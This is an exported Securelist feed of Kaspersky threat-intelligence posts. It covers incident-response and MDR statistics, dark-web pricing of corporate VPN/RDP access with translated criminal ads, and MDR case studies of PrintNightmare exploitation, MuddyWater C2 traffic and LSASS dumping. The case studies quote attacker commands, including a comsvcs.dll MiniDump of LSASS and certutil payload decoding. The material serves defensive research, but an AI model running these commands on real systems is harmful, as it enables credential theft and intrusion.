Internal threats – Securelist https://securelist.com Tue, 16 May 2023 14:09:21 +0000 en-US hourly 1 https://wordpress.org/?v=6.2.2 https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png Internal threats – Securelist https://securelist.com 32 32 The nature of cyberincidents in 2022 https://securelist.com/kaspersky-incident-response-report-2022/109680/ https://securelist.com/kaspersky-incident-response-report-2022/109680/#respond Tue, 16 May 2023 08:00:57 +0000 https://kasperskycontenthub.com/securelist/?p=109680

Kaspersky offers various services to organizations that have been targeted by cyberattackers, such as incident response, digital forensics, and malware analysis. In our annual incident response report, we share information about the attacks that we investigated during the reporting period. Data provided in this report comes from our daily interactions with organizations seeking assistance with full-blown incident response or complementary expert services for their internal incident response teams.

Download the full version of the report (PDF)

Kaspersky Incident Response in various regions and industries

In 2022, 45.9% of organizations that encountered cyberincidents were in Russia and the CIS region, followed by the Middle East (22.5%), the Americas (14.3%), and Europe (13.3%).

From an industry perspective, we offered help to government (19.39%), financial (18.37%), and industrial (17.35%) organizations most frequently.

In 2022, attackers most often penetrated organizations’ infrastructure by exploiting various vulnerabilities in public-facing applications (42.9%). However, compared to 2021, the share of this initial attack vector decreased by 10.7 pp, while the share of attacks involving compromised accounts (23.8%) grew. Malicious e-mail sharing among the initial attack vectors continued to go down and comprised 11.9% in 2022.

In 39.8% cases the reported incidents were related to ransomware attacks. Encrypted data remains the number-one problem that our customers are faced with. However, compared to 2021, the number of ransomware-related incidents dropped, and not every attack involving file encryption was aimed at extracting a ransom. In some of these incidents, ransomware was used to hide the initial traces of the attack and complicate the investigation.

Expert recommendations

To protect your organization against cyberattacks, Kaspersky experts recommend the following:

  • Implement a robust password policy and enforce multifactor authentication
  • Remove management ports from public access
  • Establish a zero-tolerance policy for patch management or compensation measures for public-facing applications
  • Make sure that your employees maintain a high level of security awareness
  • Use a security toolstack with EDR-like telemetry
  • Implement rules for detection of pervasive tools used by adversaries
  • Continuously train your incident response and security operations teams to maintain their expertise and stay up to speed with the changing threat landscape
  • Back up your data on a regular basis
  • Work with an Incident Response Retainer partner to address incidents with fast SLAs

To learn more about incident response in 2022, including a MITRE ATT&CK tactics and techniques heatmap, and distribution of various incidents by region and industry, download the full version of the report (PDF).

For a deeper analysis of the vulnerabilities most commonly exploited by cyberattackers, download this appendix (PDF).

]]>
https://securelist.com/kaspersky-incident-response-report-2022/109680/feed/ 0 full large medium thumbnail
Managed Detection and Response in 2022 https://securelist.com/mdr-report-2022/109599/ https://securelist.com/mdr-report-2022/109599/#respond Tue, 02 May 2023 08:00:15 +0000 https://kasperskycontenthub.com/securelist/?p=109599

Kaspersky Managed Detection and Response (MDR) is a service for 24/7 monitoring and response to detected incidents based on technologies and expertise of Kaspersky Security Operations Center (SOC) team. MDR allows detecting threats at any stage of the attack – both before anything is compromised and after the attackers have penetrated the company’s infrastructure. This is achieved through preventive security systems and active threat hunting – the essential MDR components. MDR also features automatic and manual incident response and expert recommendations.

The annual Kaspersky Managed Detection and Response analytical report sums up the analysis of incidents detected by Kaspersky SOC team. The report presents information on the most common offensive tactics and techniques, the nature and causes of incidents and gives a breakdown by country and industry.

2022 incidents statistics

Security events

In 2022, Kaspersky MDR processed over 433,000 security events. 33% of those (over 141,000 events) were processed using machine learning technologies, and 67% (over 292,000) were analyzed manually by SOC analysts.

Over 33,000 security events were linked to 12,000 real incidents. Overall, 8.13% of detected incidents were of high, 71.82% of medium, and 20.05% of low severity.

Response efficiency

72% of 2022 incidents were detected based on a single security event, after which the attack was stopped right away. Of these, 4% were of high, 74% of medium, and 22% of low severity.

On average, in 2022, a high severity incident took the SOC team 43.8 minutes to detect. The 2022 figures for medium and low severity incidents are 30.9 and 34.2, respectively.

Geographical distribution, breakdown by industry

In 2022, 44% of incidents were detected in European organizations. Russia and CIS are in second place with a quarter of all detected incidents. Another 15% of incidents relate to organizations from the Asia-Pacific.

Industry-wise, industrial organizations suffered more incidents than any. Most of the critical incidents were detected in government agencies, industrial and financial organizations. It is worth noting though that a fair share of critical incidents across financial organizations was due to Red Teaming events.

Recommendations

For effective protection from cyberattacks, these are Kaspersky SOC team’s recommendations to organizations:

  • Apart from the classic monitoring instruments, deploy the active threat hunting methods and tools allowing for early detection of incidents.
  • Hold regular cyberdrills involving Red Teaming to train your teams to detect attacks and analyze the organization’s security.
  • Practice the multilevel malware protection approach comprising various threat detection technologies – from signature analysis to machine learning.
  • Use MITRE ATT&CK knowledge bases.

See the full version of the report (PDF) for more information on the incidents detected in 2022, main offensive tactics and techniques, MITRE ATT&CK classification of incidents, and detection methods. To download it, please, fill in the form below.

]]>
https://securelist.com/mdr-report-2022/109599/feed/ 0 full large medium thumbnail
How much does access to corporate infrastructure cost? https://securelist.com/initial-access-data-price-on-the-dark-web/106740/ https://securelist.com/initial-access-data-price-on-the-dark-web/106740/#respond Wed, 15 Jun 2022 10:00:29 +0000 https://kasperskycontenthub.com/securelist/?p=106740

Division of labor

Money has been and remains the main motivator for cybercriminals. The most widespread techniques of monetizing cyberattacks include selling stolen databases, extortion (using ransomware) and carding. However, there is demand on the dark web not only for data obtained through an attack, but also for the data and services necessary to organize one (e.g., to perform specific steps of a multiphase attack). Complex attacks almost invariably feature several phases, such as reconnaissance, initial access to the infrastructure, gaining access to target systems and/or privileges, and the actual malicious acts (data theft, destruction or encryption, etc.). This is just one example of a phased attack where each step can be accomplished by a new contractor – if only because the different steps require different expertise.

Experienced cybercriminals seek to ensure the continuity of their business and constantly need new data for initial access to corporate systems. It’s advantageous for them to pay for prearranged access rather than spend time digging for primary vulnerabilities and penetrating the perimeter.

Request for access to corporate VPN. Source: Kaspersky Digital Footprint Intelligence service portal

Screenshot translation

Post
I will buy accounts for access to corporate VPNs or firewalls (FortiGate, SonicWall, PulseSecure, etc.) or take them for further attack development.
I have a small team.
Revenue from 150kk and higher.
Countries: US, CA, AU, GB
Suggest your price in pm, everything is negotiable
Price: 1000 USD
Send offers to private messages

Request for access to corporate VPN. Source: Kaspersky Digital Footprint Intelligence service portal

In contrast, less experienced cybercriminals are not always able to see an attack through to the end (malware execution, data theft, etc.), but are proficient enough to make money by selling initial access. This article deals specifically with this initial access market.

Types of initial access

These are the most common actions used by cybercriminals to obtain initial access to corporate infrastructure in order to develop an attack:

  • Exploitation of software vulnerabilities. For example, attacks on a corporate web resource (exploitation of first-day vulnerabilities across website components, SQL injections, gaining access to vulnerable web app control panels, etc.).
  • Obtaining legitimate corporate credentials. For example, use of data from stealer logs or password mining.
  • Phishing attacks on employees. For example, an email with a malicious payload.

You can learn more about these types of attacks and the specifics of gaining initial access from our analysis report based on data from hundreds of incident investigations.

A special mention should be made of the method for capturing legitimate accounts based on stealers. These malicious programs residing in infected devices collect various account and payment data, cookie files, authorization tokens, etc. that they save to their logs. Cybercriminals scan these logs in search of data they can exploit and monetize: some are looking for credit card data, others for domain accounts, social network accounts, etc. They refer to this stage as processing. After sorting the logs, they either exchange their finds on forums by making them public or sell them to individual buyers.

Malware log offers on a dark web forum. Source: Digital Footprint Intelligence service

Screenshot translation

[2TB of logs] I will retrieve data from my databases on your requests
Message
I have my own databases. I can retrieve data you need from my databases.
Suggest your price.
2TB of 2020-2021 data: credentials related to banking accounts and the most popular services. Profit will only be obtained from private service accounts.

Malware log offers on a dark web forum. Source: Digital Footprint Intelligence service

Free malware log offers on a dark web forum. Source: Digital Footprint Intelligence service

Screenshot translation

Malware logs (different). General topic.
Post
I publish log data of Azor ransomware for free, it could be useful for someone.
Logs contain mixed data from infected devices worldwide.

Free malware log offers on a dark web forum. Source: Digital Footprint Intelligence service

The cybercriminals are literally dealing in gigabytes of logs generated by stealers.

Large volume of logs uploaded to a file exchange service

Large volume of logs uploaded to a file exchange service

Large volume of logs uploaded to a file exchange service

Topic on dark web forum with a request for specific malware logs

Screenshot translation

Verified! I will buy information retrieved from your log data (USA) based on my request [MAIL:PASS only required]
Good day!
I will buy information retrieved from your log data (with USA-related data extracted) based on my request.
I buy at least 150 lines, thus, I will not pay if you will send me less lines.
Warning! I buy only user credentials (MAIL:PASS) data from your logs, which match my requirements, I do not need the whole logs
If you do not know how to extract mail:pass data from logs, you can use StealerLogSearcher v1.3
My request:

  • I have Brute/Checker [it does not work fast]
  • I pay only for valid credentials + credit cards data (no matter if credit card is active or not)
  • Your own log data is the priority, I already have 95% of public logs
  • Price is 0.5 USD for valid user account with linked card
  • NO payment for already used accounts (I can see it by log data) | If more than 80% of accounts in the database have already been used, I will NOT PAY FOR PROVIDED LINES AT ALL.
  • I normalize the provided database, remove duplicates and compare with my anti-public database before processing your data via brute/checker
  • I work with everybody on a first-come, first-served basis, if my software is already processing someone’s database – wait
  • I only work with a guarantee or first logs, then payment. Doesn’t matter who you are.
  • I won’t work with you if you act crazy, hurry me, talk rude, cadge, etc.

Topic on dark web forum with a request for specific malware logs

Screenshot translation

Hi everybody! I am looking for checked (verified) mixed Facebook logs.
The catalog with log data should contain Facebook EAAB (access) token and cookie file, an example is attached.
I need valid logs.
Initially, required value of data is 100-200 samples per week.
Contact me via private messages or Telegram. Thank you for your attention!

Topic on dark web forum with a request for specific malware logs

Main criteria for initial access valuation

Cybercriminals use a set of criteria when describing which company they sell access to on dark web forums: company size, revenue, business area, region and so forth. Yet, from analyzing a lot of posts you could conclude that corporate revenue is the main criterion: almost all posts mention revenue, whereas the region and business area of the target company are advertised much less. Some posts also refer to the level of complexity as a reason for high prices, i.e., how much time and effort the seller spent to gain access. But this is quite a subjective criterion that depends, among other things, on the cybercriminal’s expertise.

Announcements on a dark web forum offering VPN/RDP network access to different organizations

Screenshot translation

I sell VPN accounts of USA companies, revenue is 1kkk$
Post
Company is a global organization that provides technologies and services for customers and specializes in design and implementation
Employees: more than 50 000
Revenue: $1 billion
USA
Price: 7 000$
Access type: VPN
Company is a leading provider of web presence solutions for small and mid-sized businesses worldwide.
Employees: 2k+
Revenue: 700kk$
USA
Price: 5 000$
Access type: VPN
We work with guarantees; otherwise, you pay a deposit and I will provide you with access information in advance.
First contact in private messages.

Announcements on a dark web forum offering VPN/RDP network access to different organizations

Screenshot translation

[Sale] VPN-RDP accounts for network access
Post
Company is a law firm providing legal support services to clients, assistance in business projects start-up and pre-trial proceedings.
Country: France
Access type: VPN-RDP
Revenue: 8kk+$ (information is current as of 2019)
Access level: Admin
Price: 300$
Company is a private healthcare organization with its own laboratory. It provides wide-ranging medical services.
Country: USA
Access type: VPN-RDP
Revenue: 3kk+$
Access level: Admin
Price: 300$
Company provides a wide range of construction services, including door/window installation. It also has its own production facility.
Country: United Kingdom
Access type: VPN-RDP
Revenue: 2kk+$
Access level: Admin
Price: 200$
Company produces branded clothes.
Country: USA
Access type: VPN-RDP
Revenue: 6kk+$]

Announcements on a dark web forum offering VPN/RDP network access to different organizations

In addition to the target company’s features, the price can also depend on the type of access offered. Information about a vulnerability (e.g., SQL injection) and legitimate credentials (e.g., RDP/SSH) will be priced very differently for companies with comparable revenues, because they offer a different probability of a successful attack. Selling an account to access remote management interfaces (RDP, SSH) means that access to a system in the corporate network infrastructure has already been gained, whereas a vulnerability merely offers the chance to achieve a similar level of access. Even when it comes to the same issue, such as an SQL injection, there are many factors affecting the potential development of the attack (vulnerable host location (e.g., corporate network or cloud server), what DBMS is used, the intended vulnerability exploitation technique, database volume, etc.) and, therefore, its cost.

Cost of initial access

To find out how these criteria influence the cost of access, we analyzed about 200 posts published on two popular dark web forums. We identified a set of relevant parameters for each one:

  • Corporate revenue
  • Type of access
  • Price of data
  • Company info (region, business area, etc.)

That done, we screened out from our selection the irrelevant posts – those not stating revenue or the price of network access data. This reduced the total number to 117 posts.

The following diagram shows the correlation between lot price and revenue without considering the technical factors:

The correlation between the price of network access data and a company’s revenue (download)

As you can see:

  • Most offers fall within the $0–$5,000 price range
  • Most offers refer to moderately sized companies
  • Average price of access data (depicted as a trend line) is between several hundred and five thousand dollars, and grows as revenue increases

Some of the major deviations from the price range can be explained by lot characteristics, such as business area specifics. For instance, network access data for a company specializing in POS terminals and providing internet acquiring services is valued much higher ($20,000) than other similar offers. The price may also be increased by “bonuses” attached to the lot, such as an already compromised database containing email addresses or other sensitive or confidential data sold in the same package along with the access. The buyer can either process these later or use and resell them separately.

If we take a closer look at the price distribution across the whole body of offers, almost half of them (42.74%) are under $1,000.

Offers grouped by price category (download)

If analyzed in terms of access type, most posts offer RDP access or a VPN + RDP bundle (75.21% of lots). In the diagram below both of these options belong to the categories “RDP access (without details)”, “RDP access (local admin)”, “RDP access (domain admin)” and “RDP access (user)”.

Offers grouped by access type (download)

To get a clearer picture of the connection between lot price and corporate revenue, we analyzed the posts offering data for RDP access – the most common access category and most uniform pricewise – for large businesses with revenue of over $500 million. The following diagram shows how revenue affects the cost of data for RDP access.

The correlation between RDP access cost and large company revenue (download)

This diagram doesn’t demonstrate a direct correlation between access cost and corporate income. However, the selection is quite small, meaning the disproportionate influence of variable access properties (user privileges, a company’s country/region/industry) could skew any remotely objective conclusions based on quantitative analysis.

One way or another, access to large business infrastructure usually costs between $2,000 and $4,000, which are relatively modest prices. But there is no upper limit to the cost either. For example, in the topic below the original lot price was $50,000 (the lot also covered a number of sub-companies). And even though the price was later halved by the seller, one of the thread members called the offer overpriced.

Sale of data for remote access to five companies in one network for $50,000

Screenshot translation

Hi, I offer VPN-RDP access
There is access data to 2-3 domains of that network, the total number is 3-4, I don’t know exactly, see the screenshot below for DNS servers!
Country: Australia
The company sells goods, not foodstuffs etc., but garments etc.! more in pm!
Revenues differ, 465 million for the main company only, and there is access to their networks, there is also an account with their domain, I could not get access to the domain itself so far! but if you try you can gain access to all domains in their different networks!
Respond only if ready to buy, preferably with a big deposit
Price: $50k not much for several companies with resources on one network. There are lots of RDP interfaces, RDP is closed on some servers, but it can still be opened easily using PSexec or using your own method!
not in a hurry to sell. every network has its own network access servers, I think some of them were accessible, there is lots of data for processing with a good chance of a successful outcome! The country is not poor, so if an attack is conducted well, the payoff will be substantial!
Updating my post, I have taken 4 Domain Admins, let me make it clear for the dumb ones out there, 4 Domain Admins means different accounts for different ADs. for example, there is a network XXXX with several AD services each with user accounts of its own, there is also another XXXX network also with several ADs and accounts of its own, well, I have access to each AD from the different networks, you will be able to compromise networks of 4-5 different companies in one go, all these companies belong to 1 head company, and four subsidiaries are on the same VPN network, and they are all interconnected, each network has an internet adapter of its own, as I said before, respond only if ready to buy, preferably with a big deposit!

Sale of data for remote access to five companies in one network for $50,000

Price reduced from $50,000 to $25,000

Screenshot translation

If you buy today I will cut the price down to $25K
Warning from moderator: work strictly through guarantee

Price reduced from $50,000 to $25,000

Comment about the offer being overpriced

Screenshot translation

You seem to have no clue what access is and what its price is, nobody will buy it even for 3K, 95% probability

Comment about the offer being overpriced

Response to comment about the offer being overpriced

Screenshot translation

Your message is funny, I saw people selling access for $100K, I saw people getting many times more than they had paid, this is what buying access is all about, if you buy access for ransomware and process it properly, and if you get paid around $200K which is nothing for companies like that, you get huge profit, I’m not mentioning people charging $1mn and more, if you are not happy about something keep your comments to yourself, do not litter the thread!

Response to comment about the offer being overpriced

Discussion continuation. Source: Digital Footprint Intelligence service

Screenshot translation

2 minutes ago Eastfarmer said:
I can’t stop laughing, don’t you mind the disgrace, what is it I don’t know about ransomware? are you the person who enters, checks nothing and encrypts the first random machines? $1k? go ahead and tell me why it should cost $1k. is it just one company with 20 computers and revenue of 10 mn? don’t be stupid man. I am telling you again there are 5 companies, they are all subsidiaries of a head company, a subsidiary has $465mn revenue, others a bit less. Australians?)))))) you mean Australians are poor? do they have a poor economy? man, people pay huge money even for African companies. What are you trying to tell me, a friend of mine pocketed $200k from a company with $15mn revenue. It was Estonia, or maybe you are a friend and supporter of the first two dudes or just a windbag? I really don’t get it what are you trying to make of it, if they don’t buy it so be it, why this pointless flood? can’t you just pass it by? mind your own business
I didn’t say a word about you being a poor pentester. I said you are poor ransomwarer at least because you have not conducted the attack yourself)) do you understand the difference, nobody insulted you as a specialist, if you took offence I am sorry. I will not write to your thread any more

Discussion continuation. Source: Digital Footprint Intelligence service

Here is another example of a high price being asked for data belonging to a company with a revenue of $500 million. The asking price is 12 BTC.

Lot price 12 BTC

Screenshot translation

Australia
Revenue: > $500 million+
There is access to a network, admin-level access, direct connection to SSH servers, access to backups.
Price: 12 BTC
All questions in pm

Lot price 12 BTC

Interestingly, gaining access to corporate networks is in high demand, with some lots selling the same day they are published.

Access data sold on the day of publication

Access data sold on the day of publication

Access data sold a few days after publication

Access data sold a few days after publication

Ransomware auctions: stolen data pricing

Undoubtedly, one of the most important components of the initial access price is the amount of money the buyer can potentially earn from an attack conducted using that access. Cybercriminals are ready to pay thousands or even tens of thousands of dollars for the opportunity to infiltrate a corporate network for a reason. Successful attacks pay off very nicely. Ransomware attacks are a prime example. In attacks like that malware usually encrypts a significant amount of data on workstations or servers, virtually paralyzing the company’s operations or causing material risks to its business processes. Once encryption is accomplished, the attackers contact the victim with an offer to buy decryption keys. These often cost millions of dollars. For example, according to media reports, a European travel agency dished out $4.5 million, and a large American insurer a whopping $40 million in ransom money.

Of late, cybercriminals have tended not only to encrypt but also steal corporate data. They may later post some of the stolen data in their blogs – primarily as proof but also as extra leverage –threatening to publish more unless the company pays them the money they demand within the stipulated timeframe.

Different ransomware groups follow different approaches to publishing stolen data.

  • Some of them publish information about the incident (along with the data) only if no agreement is reached with the victim.
  • Some publicize the incident immediately after the attack and state exactly when they plan to begin disclosing critical data.
  • Some set up an auction in which the stolen data will go to whoever is willing to pay the highest price (presumably a single buyer). In this latter case, the auction price of a lot – though smaller than the ransom charged for data decryption – can still be several times more than the price of access to the corporate system.

If we take a look at posts offering stolen data to a single buyer, the lot price normally starts in the tens of thousands of dollars, often reaching sums of around a million.

Blackmailer blog: auction price of stolen data

Blackmailer blog: auction price of stolen data

Blackmailer blog: auction price of stolen data along with published data

Blackmailer blog: auction price of stolen data along with published data

Blackmailer blog: auction closed (stolen data sold to a single buyer)

Blackmailer blog: auction closed (stolen data sold to a single buyer)

Blackmailer blog: active auction

Blackmailer blog: active auction

Blackmailer blog: stolen data published in parts (one part at a time)

Blackmailer blog: stolen data published in parts (one part at a time)

Blackmailer blog: data on Charlie Hebdo terrorist attack stolen from a legal firm are available for $1 million

Blackmailer blog: data on Charlie Hebdo terrorist attack stolen from a legal firm are available for $1 million

Blackmailer blog: attackers announce the publication of stolen data after they failed to negotiate with the victim company

Blackmailer blog: attackers announce the publication of stolen data after they failed to negotiate with the victim company

Blackmailer blog: attackers announce they are waiting for the ransom (1 day and 11 hours left before the publication of stolen data)

Blackmailer blog: attackers announce they are waiting for the ransom (1 day and 11 hours left before the publication of stolen data)

Blackmailer blog: the attackers published the stolen data because the ransom was not paid

Blackmailer blog: the attackers published the stolen data because the ransom was not paid

Conclusion

Demand for corporate data on the black market is high, and it doesn’t always involve targeted attacks. Attackers may gain access to the infrastructure of a random company to sell it to blackmailers or other advanced cybercriminals later. An attack like that can affect a company of any size, big or small, because corporate system access is often priced moderately on underground forums, especially compared to the potential damage to a business.

Sellers on the dark web most often offer remote access via RDP. To protect corporate infrastructure from attacks through remote access and control services, make sure the connection via this protocol is secure by:

 

[1] For details of the service and test access, please contact us at intelligence@kaspersky.com

]]>
https://securelist.com/initial-access-data-price-on-the-dark-web/106740/feed/ 0 full large medium thumbnail
Managed detection and response in 2021 https://securelist.com/managed-detection-and-response-in-2021/106540/ https://securelist.com/managed-detection-and-response-in-2021/106540/#comments Thu, 26 May 2022 11:00:55 +0000 https://kasperskycontenthub.com/securelist/?p=106540

Kaspersky Managed Detection and Response (MDR) helps organizations to complement existing detection capabilities or to expand limited in-house resources to protect their infrastructure from the growing number and complexity of threats in real time. We collect telemetry from clients’ networks and analyze it using machine learning and artificial intelligence, plus human threat-hunting analysts. Kaspersky SOC investigates alerts and notifies the client if there is something bad going on, providing response actions and recommendations.

MDR in 2021 in numbers

In 2021:

  • Kaspersky MDR received 414K alerts.
  • 63.74% of received alerts were processed by SOC analysts, 6.67% of which were related to real incidents reported to customers via the MDR portal
  • 77.4% of all incidents are related to only one alert
  • 14% of incidents were high-severity, 66% medium-severity, and 20% low-severity
  • The average identification time of high-severity incidents was 41.4 minutes
  • 40.7% of high-severity incidents were targeted attacks; 18% were ethical offensive exercises (penetration testing, red teaming etc.)
  • Most incidents were detected at the initial access (27.3%) and lateral movement (16.3%) stages
  • Most often high-severity incidents were detected in IT (39%), industrial (30.2%), and financial (29.1%) organizations
  • The LOL binaries most often used by attackers were cmd.exe, powershell.exe, and rundll.exe

Download the full Kaspersky Managed Detection and Response 2021 report.

]]>
https://securelist.com/managed-detection-and-response-in-2021/106540/feed/ 2 full large medium thumbnail
Kaspersky Managed Detection and Response: interesting cases https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/ https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/#comments Wed, 15 Dec 2021 10:00:42 +0000 https://kasperskycontenthub.com/securelist/?p=105214

Kaspersky Managed Detection and Response (MDR) provides advanced protection against the growing number of threats that bypass automatic security barriers. Its capabilities are backed by a high-professional team of security analysts operating all over the world. Each suspicious security event is validated by our analysts complementing the automatic detection logic and letting us continuously improve the detection rules.

The MDR results allow us to map out the modern threat landscape and show techniques used by attackers right now. We share these results with you so that you are more informed about in-the-wild attacks and better prepared to respond.

PrintNightmare vulnerability exploitation

This summer, we witnessed a series of attacks using a dangerous vulnerability in the Windows Print Spooler service: CVE-2021-1675/CVE-2021-34527, also known as PrintNightmare. This vulnerability was published in June 2021 and allows attackers to add arbitrary printer drivers in the spooler service and thus remotely execute code on a vulnerable host under System privileges. We have already published the technical details of this vulnerability, and today we will talk about how MDR analysts detected and investigated attacks that exploit this vulnerability in real companies.

Case #1

Shortly after the PrintNightmare vulnerability was published, a detailed report with a technical description of the problem, as well as a working PoC exploit, was posted on GitHub by mistake. The repository was disconnected several hours later, but during this time several other users managed to clone it.

Kaspersky detected an attempt to exploit the PrintNightmare vulnerability using this publicly available tool. The MDR team observed a request to suspicious DLL libraries from the spooler service. It should be noted, that the file names used by the attacker were exactly the same as those available in the public exploit on GitHub.

Kaspersky detected suspicious DLL libraries (nightmare.dll) on the monitored host. C:\Windows\System32\spool\drivers\x64\3\nightmare.dll C:\Windows\System32\spool\drivers\x64\3\old\1\nightmare.dll
In addition, the following script was found on the host. \cve-2021-1675-main-powershell\cve-2021-1675-main\cve-2021-1675.ps1

The table below contains signs of suspicious activity that served as a starting point for the investigation.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1210:
Exploitation of
Remote
Services
Local File Modification Modified file path:
C:\Windows\System32\spool\drivers\x64\3\old\
1\nightmare.dll
File modifier:
C:\Windows\System32\spoolsv.exe
Parent of the modifier:
C:\Windows\System32\services.exe
Legitimate spoolsv.exe
locally modified
c:\windows\system32
\spool\drivers\x64\
3\old\1\nightmare.dll
T1588.005:
Obtain
Capabilities:
Exploits
AV exact detect in
OnAccess mode
File:
\cve-2021-1675-main-powershell\cve-2021-
1675-main\cve-2021-1675.ps1
AV verdicts:
Exploit.Win64.CVE-2021-1675.c;
UDS:Exploit.Win64.CVE-2021-1675.c
CVE-2021-1675 exploit
was detected and
successfully deleted
by AM engine

Case #2

In another case, MDR analysts discovered a different attack scenario related to the exploitation of the PrintNightmare vulnerability. In particular, spooler service access to suspicious DLL files was observed. In addition, the spooler service executed some unusual commands and established a network connection. Based on the tools used by attackers, we presume that this activity was related to penetration testing.

MDR analyst detected the creation of suspicious DLL libraries using the certutil.exe tool on a monitored host.
After that, the spooler service was added to the planned tasks.
C:\Windows\System32\spool\driver
s\x64\3\new\hello.dll
C:\Windows\System32\spool\driver
s\x64\3\new\unidrv.dll…
Next, the spooler service called the newly created DLL files.
In addition, the attacker ran some of the created libraries using the rundll32 component.
Several hours later, a new wave of activity began. The Kaspersky MDR team detected a registry key modification that forces NTLMv1 authentication. It potentially allows NTLM hashes to be intercepted. \REGISTRY\MACHINE\SYSTEM\Control
Set001\Control\Lsa\MSV1_0
Then the attacker re-added spooler to the planned tasks.
After that, execution of various commands on the host with System privileges was observed. The source of this activity was c:\windows\system32\spoolsv.exe process
C:\Windows\System32\cmd.exe /c
net start spooler
C:\Windows\System32\cmd.exe /c
timeout 600 > NUL &&
net start spooler

The table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1570:
Lateral Tool Transfer
Web AV exact detect in OnDownload mode AV verdict: HEUR:Trojan.Win32.Shelma.gen Attacker downloads
suspicious DLL (that is,
Meterpreter payload) via
HTTP
T1140:
Deobfuscate/Decode Files or Information
Local File Modification Process command lines:
certutil  -decode 1.txt
C:\Share\hello4.dll
Attacker used certutil
to decode text file into PE
binary
T1003.001:
OS Credential Dumping: LSASS Memory
AV exact detect in OnAccess mode AV verdicts:
VHO:Trojan‑PSW.Win64.Mimikatz.gen
Trojan-PSW.Win32.Mimikatz.gen
Attacker tried to use
Mimikatz
T1127.001:
Trusted Developer Utilities Proxy Execution: MSBuild
Outbound network connection Process command line:
C:\Windows\Microsoft.NET\Framework\v4
.0.30319\MSBuild.exe  C:\Share\1.xml
MSBuild network activity
T1210:
Exploitation of Remote Services
Local File Modification Modified file path:
C:\Windows\System32\spool\drivers\x64
\3\old\1\hello5.dllFile modifier:
C:\Windows\System32\spoolsv.exe
Parent of the modifier:
C:\Windows\System32\services.exe
Legitimate
spoolsv.exe locally
modified
c:\windows\system3
2\spool\drivers\x6
4\3\old\1\hello5.dll
T1547.012:
Boot or Logon Autostart Execution: Print Processors
T1033:
System Owner/User Discovery
Process start Command line: whoami
Process integrity level: System
Parent process:
C:\WINDOWS\System32\spoolsv.exe
Grandparent process:
C:\Windows\System32\services.exe
Legitimate
spoolsv.exe started
whoami with System
integrity level
T1547.012:
Boot or Logon Autostart Execution: Print Processors
Outbound network connection Process command line:
C:\Windows\System32\spoolsv.exe
Remote TCP port: 4444/TCP
Legitimate
spoolsv.exe made a
connection to default
Meterpreter port
(4444/TCP)
T1547.012:
Boot or Logon Autostart Execution: Print Processors
T1059.003:
Command and Scripting Interpreter: Windows Command Shell
T1033:
System Owner/User Discovery
Process start Command line: whoami
Process integrity level: System
Parent process:
C:\Windows\System32\cmd.exe
Grandparent process:
C:\Windows\System32\spoolsv.exe
Legitimate
spoolsv.exe started
cmd.exe that started
whoami with System
integrity level

MuddyWater attack

In this case, the Kaspersky MDR team detected a request from the customer’s infrastructure to a malicious APT related host. Further investigation allowed us to attribute this attack to the MuddyWater group. MuddyWater is a threat actor that first surfaced in 2017. This APT group mainly targets government agencies in Iraq, Saudi Arabia, Jordan, Turkey, Azerbaijan, and Pakistan. Kaspersky’s report on this group’s activity is available here.

Among other methods, the group uses VBS implants in phishing emails as an initial attack vector. During execution, the implant accesses URLs with a common structure to connect to the C2 server. The typical structure of the URL is provided below.

First of all, MDR analysts found a VBS implant from startup, presumably related to the MuddyWater group, to be running on the monitored host. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KLWB6.vbs
After script execution, some malicious resources were accessed. The structure of these URLs follows the common structure used by the MuddyWater group. In addition, the accessed IP address was observed in other attacks of this group. hxxp://185[.]117[.]73[.]52:443/getTarget
Info?guid=xxx-yyy-zzz&status=1
hxxp://185[.]117[.]73[.]52:443/getComman
d?guid=xxx-yyy-zzz*
Next, execution of commands to collect information from the compromised host was observed. “C:\Windows\System32\cmd.exe” /c
explorer.exe >>
c:\ProgramData\app_setting_readme.txt “C:\Windows\System32\cmd.exe” /c whoami >> c:\ProgramData\app_setting_readme.txt

* xxx is company short name (identifier), yyy is the victim hostname and zzz is username

Table below contains signs of suspicious activity that were the starting point for investigation.

MITRE ATT&CK Technique MDR telemetry event type used Detection details Description
T1071:
Application Layer Protocol
Access to malicious hosts from nonbrowsers Target URL:
hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid
=xxx-yyy-zzz&status=1
CMD line:
“C:\Windows\System32\WScript.exe” C:\Users\USERNAME\AppData\Roaming\Microsoft\Windo
ws\Start Menu\Programs\Startup\KLWB6.vbs
Process:
C:\Windows\system32\wscript.exe
VBS script accessed malicious URL during execution
T1071:
Application Layer Protocol
URL exact detect Malicious URL:
hxxp://185[.]117[.]73[.]52:443/getTargetInfo?guid
=xxx-yyy-zzz&status=1
AV verdict:
Malware
Malicious URL was successfully detected by AV

Credential Dumping from LSASS Memory

In the last case, we’d like to talk about an attack related to collecting credentials from the LSASS process memory dump (T1003.001 MITRE technique). Local Security Authority Subsystem Service (LSASS) stores a variety of credentials in process memory. These credentials can be harvested by System or administrative user and then used for attack development or lateral movement.

MDR analysts detected an attempt to dump the LSASS process memory on the monitored host, despite the fact that most of the attacker’s actions did not differ from the usual actions of the administrator. The attackers used two public tools (the first one was detected and blocked by an AV solution) to dump the LSASS process memory and export the obtained dump via Exchange server. In particular, the MDR team observed the download and execution of a suspicious DLL file (categorized as SSP) by LSASS.exe.

The attacker executed several recon commands to get more information about the host, and then ran commands to get the LSASS process ID. C:\Windows\System32\tasklist.exe
C:\Windows\System32\findstr.exe /i sass
After that, the attacker tried to run a malicious tool to dump the process memory, but it was blocked by an endpoint protection solution. “C:\Windows\System32\rundll32.exe”
C:\Windows\System32\comsvcs.dll MiniDump 616
c:\programdata\cdera.bin full

## 616 is LSASS process id

Then the attacker tried to dump the LSASS process memory using another tool. They unzipped an archive containing the resource.exe and twindump.dll files. C:\Windows\System32\cmd.exe /C c:\”program files”\7-
zip\7z.exe x -pKJERKL6j4dk&@1 c:\programdata\m.zip -o
c:\windows\cluster

## resource.exe and twindump.dll files were created

Subsequently, the file resource.exe was added to the planned tasks and executed. However, the attempt to obtain an LSASS dump was unsuccessful. C:\Windows\System32\cmd.exe /C
C:\Windows\System32\staskes.exe /create /tn Ecoh /tr
